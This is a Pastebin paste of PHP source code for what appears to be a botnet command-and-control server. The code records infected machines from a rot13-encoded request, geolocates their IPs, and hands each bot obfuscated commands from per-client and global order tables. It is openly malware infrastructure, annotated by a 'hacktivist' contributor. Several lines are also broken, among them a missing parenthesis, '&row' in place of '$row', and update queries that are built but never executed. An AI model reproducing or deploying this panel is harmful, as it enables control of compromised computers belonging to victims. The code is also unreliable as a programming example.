Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?PHP
- /*
- CREATE TABLE `clients` (
- `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
- `serial` varchar(25) NOT NULL,
- `comp_name` varchar(128) NOT NULL,
- `os` varchar(5) NOT NULL,
- `delay` bigint(20) NOT NULL,
- `report_time` TIMESTAMP NOT NULL,
- `lastorder_id` bigint(10),
- `uptime` varchar(128) NOT NULL,
- `ip` varchar(15) NOT NULL,
- `country_code` varchar(5) NOT NULL,
- `country_name` varchar(20) NOT NULL,
- `version` varchar(10) NOT NULL
- ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
- CREATE TABLE `global_orders` (
- `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
- `order` varchar(128),
- `order_time` TIMESTAMP NOT NULL,
- `exp_date` DATE NOT NULL
- ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
- CREATE TABLE `orders` (
- `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
- `clientid` bigint(20) unsigned NOT NULL,
- `order` varchar(128),
- `order_time` TIMESTAMP NOT NULL
- ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
- */
- // file: info.php
- include("geoip.inc"); // [hacktivist:code]: for the geoip function added
- function isRowEmpty($row)
- {
- foreach($row as $a)
- {
- if(!empty($a))
- {
- return false;
- }
- }
- return true;
- }
- function sanitize($data)
- {
- // remove whitespaces (not a must though)
- $data = trim($data);
- // apply stripslashes if magic_quotes_gpc is enabled
- if(get_magic_quotes_gpc())
- {
- $data = stripslashes($data);
- }
- // a mySQL connection is required before using this function
- $data = mysql_real_escape_string($data);
- return $data;
- }
- // database connection information
- $database = "database_name";
- $user = "user_name";
- $password = "Pa$$worD";
- $host = "localhost";
- // connect to the database
- $mysql = mysql_connect( $host, $user, $password );
- mysql_select_db( $database );
- $buffer_crypted = sanitize($_GET['sid']);
- $buffer_clear = str_rot13($buffer_crypted);
- // decrypted buffer in this format h6Yht56RfT:UncleBoB-PC:WIN7:50000:m1.0:7653332:22
- // $serial:$comp_name:$os:$delay:$version:$uptime:$lastorder_id
- $serial = strtok($buffer_clear, ":");
- $comp_name = strtok(":");
- $os = strtok(":");
- $delay = strtok(":");
- $version = strtok(":");
- $uptime = strtok(":");
- $lastorder_id = strtok(":");
- $ip = getenv("REMOTE_ADDR");
- // sanitize ints
- $delay = intval($delay);
- $uptime = intval($uptime);
- // format uptime
- $minsuptime = $uptime % 60;
- if ( $minsuptime > 1 )
- {
- $minsuptime = $minsuptime." Minutes";
- }
- else
- {
- $minsuptime = $minsuptime." Minute";
- }
- $hoursuptime = $uptime / 60 % 24;
- if ( $hoursuptime > 1 )
- {
- $hoursuptime = $hoursuptime." Hours";
- }
- else
- {
- $hoursuptime = $hoursuptime." Hour";
- }
- $daysuptime = $uptime / 60 / 24 % 7;
- if ( $daysuptime > 1 )
- {
- $daysuptime = $daysuptime." Days";
- }
- else
- {
- $daysuptime = $daysuptime." Day";
- }
- $weeksuptime = $uptime / 60 / 24 / 7 % 52;
- if ( $daysuptime > 1 )
- {
- $weeksuptime = $weeksuptime." Weeks";
- }
- else
- {
- $weeksuptime = $weeksuptime." Week";
- }
- $uptimeformated = $weeksuptime.", ".$daysuptime.", ".$hoursuptime.", ".$minsuptime;
- // [hacktivist:code] added geolocate IP, added the new fields in the clients table
- $gi = geoip_open("GeoIP.dat",GEOIP_STANDARD);
- $country_code = geoip_country_code_by_addr($gi, $ip);
- $country_name = geoip_country_name_by_addr($gi, $ip);
- geoip_close($gi);
- if( $serial != NULL )
- {
- // populate SQL table
- $sql = "SELECT id FROM clients WHERE serial LIKE '$serial'";
- $result = mysql_query( $sql );
- if( mysql_num_rows( $result ) )
- {
- // if in the clients table update info
- $sql = "UPDATE clients SET report_time=NULL, version='$version', uptime='$uptimeformated', delay='$delay', ip='$ip', country_code='$country_code', country_name='$country_name', lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
- $result = mysql_query( $sql );
- // get the id of the connected client
- $sql = "SELECT * FROM clients WHERE serial LIKE '$serial'";
- $result = mysql_query( $sql );
- $row = mysql_fetch_array( $result );
- $clientid = $row['id'];
- // checks the orders table to see if there is a specific order for this client
- $sql = "SELECT * FROM orders WHERE clientid LIKE '$clientid'";
- $result = mysql_query( $sql );
- $row = mysql_fetch_array( $result ); // stores the row that contains the order information for that specific client
- if (!isRowEmpty($row) // if there is a specific bot command prints it out
- {
- // echo the command to the client and clear it from the orders table
- echo ">".str_rot13($row['order'])."<\n";
- $id = $row['id'];
- $sql = "DELETE FROM orders WHERE id LIKE '$id'";
- mysql_query( $sql );
- }
- else // grabs the next command it hasn't done in the global_orders table
- {
- // if lastorder_id = 0 then same but no where stuff, just to get the first row of the table
- if ($lastorder_id == 0)
- {
- $sql = "SELECT * FROM global_orders";
- $result = mysql_query( $sql );
- $row = mysql_fetch_array( $result ); // stores the first row in global_orders
- if ( CURDATE() < &row['exp_date'] ) // check if the command is old or not
- {
- echo ">".str_rot13($row['order'])."<\n"; // echo the command to the client
- $sql = "UPDATE clients SET lastorder_id='$row['id']' WHERE serial LIKE '$serial'";
- }
- }
- else
- {
- // check if the command is old or not to implement
- $sql = "SELECT * FROM global_orders WHERE id LIKE '$lastorder_id + 1'";
- $result = mysql_query( $sql );
- $row = mysql_fetch_array( $result ); // stores the row that contains the order information
- if ( CURDATE() < &row['exp_date'] ) // check if the command is old or not
- {
- echo ">".str_rot13($row['order'])."<\n"; // echo the command to the client
- $sql = "UPDATE clients SET lastorder_id='$row['id']' WHERE serial LIKE '$serial'";
- }
- }
- }
- }
- else
- {
- // else insert info into the clients table
- $sql = "INSERT INTO clients ( comp_name, serial, os, ip, country_code, country_name, delay, version, uptime, lastorder_id ) VALUES ( '$comp_name ', '$serial', '$os', '$ip', '$country_code', '$country_name', '$delay', '$version', '$uptimeformated', '$lastorder_id' )";
- if( mysql_query( $sql ) )
- echo ">ADDED<\n"; // allows the client to know it was succesfully added if needed
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement